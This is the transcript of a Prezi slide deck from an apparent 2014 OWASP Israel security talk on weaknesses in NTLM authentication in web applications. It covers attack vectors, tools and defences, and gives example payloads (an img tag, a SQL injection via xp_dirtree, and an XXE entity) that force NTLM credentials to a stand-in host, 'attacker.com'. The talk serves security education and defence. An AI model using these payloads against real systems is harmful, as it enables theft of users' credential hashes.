Prezi

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in the manual

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

NTLM Based Authentication in Web Applications:

No description
by Hacktics Advanced Security Center on 15 January 2014

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of NTLM Based Authentication in Web Applications:

NTLM Based Authentication in Web Applications:
The
Good
, The
Bad
, and the
NHASTIE
Oren Ofer, Hacktics ASC
About Me
Information Security Department Leader, EY
Application Security Assessments
Mobile Security Assessments
Network / Infra Security Assessments
Spear Phishing Simulations
Researcher
Trainer


14th Januray 2014, OWASP Israel
Demo Time
NTLM IS A…
NT LAN Manager Authentication Protocol
Replaced Lan Manger Authentication
Supports Connection Oriented Protocols
Supports Connectionless Protocols
NTLM IS A…
Official Versions: v1, v2
Challenge Response Authentication

CIFS / SMB
FTP / SFTP
HTTP / HTTPS
IMAP
L2TP
LDAP
MS SQL
MS-RPC / MS-RPC/HTTP
POP3
PPTP-MPPE
RADIUS (WiFi)
RDP
SIP / SIP/TLS
SMTP
Telnet
Client
Server
TCP Socket
GET / HTTP/1.1
GET / HTTP/1.1
Authorization: NTLM base64(NTLMSSP + padding)
HTTP/1.1 401 Access Denied
WWW-Authenticate: Negotiate or WWW-Authenticate: NTLM
HTTP/1.1 401 Access Denied
Authorization: NTLM base64(NTLMSSP, Challenge, Domain, Host)
GET / HTTP/1.1
Authorization: NTLM base64(NTLMSSP + Domain User, Host, Challenge Response)
HTTP/1.1 200 OK
C
S
Simplified NTLM HTTP in TCP Socket
NTLM IS Also…
Reported with design flaws since 1996.
*https://www.usenix.org/legacy/events/sec10/tech/slides/geer.pdf

Many design flaws.
Many many many design flaws.
Many many many many Design Flaws.
Let's list a few, well at least until 2010

Why NTLM is Still Alive?!
"Single Sign On"
“Backwards compatibility”
"Easy to deploy"
"Cost efficient"
“Is strong if deployed correctly”
“Inside the internal infra it is okay…”
"No easy alternatives"


Ntlm Http Session TIer Exploit
NTLM Attack Vectors
NTLM Extraction from Sam & Memory*
Force Auto Submission
Offline Cracking
Replay/Relay Attacks
TCP Session Hijacking*
Application Perspective
NTLM Extraction from Sam & Memory*
XSS / CSRF
<img src="file://attacker">
SQL Injection
user="test';EXEC master.sys.xp_dirtree '\\attacker.com
Word Document Template
XML External Entity (XXE)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///attacker.com" >]><foo>&xxe;</foo>
Office Preview
Phishing
Desktop.ini
.lnk file
Force Auto Submission
Requires Admin User
Pass the Hash
Publicly available tools
Offline Cracking
Cryptographic Flaws
Rainbow Tables
Cloud Super Computer
Downgrade Attacks
What is your GPO configuration?
Replay & Relay
WCE
Mimikatz
Pwdump
...
1. Client requests: "let's use NTLM version STRONG"
2. Server Responds : "Let's use NTLM version WEAK"
3. Client says: "Okay"

Replay - Resend a valid authentication
Relay - Authenticate through the attacker
Relay
NTLM in Web Applications
Based on Shodanhq.com:
172,000 websites respond with NTLM
68,657 NTLM MicrosoftSharePointTeamServices
Meaning 40%!
NTLM Cross Protocol Relay Example
HTTP NTLM in OWASP Top 10
How to Defend Web Applications?
Form Based Authentication!
Thank you!
Application Perspective
No Autocomplete=off
Users can be auto-connected = Persistent Cookie
NHASTIE
TCP Socket
TCP Socket
Victim
NTLM HTTP
SMB 2 HTTP
Open Malicious
Word file
SQL Injection
Oren Ofer, Hacktics ASC
@oren1ofer
oren.ofer@il.ey.com

A2-Broken Authentication and Session Management
A5-Security Misconfiguration
A6-Sensitive Data Exposure
A8-Cross-Site Request Forgery
A9-Using Components with Known Vulnerabilities
NHASTIE Projects:
https://github.com/hacktics/nhastie
See the full transcript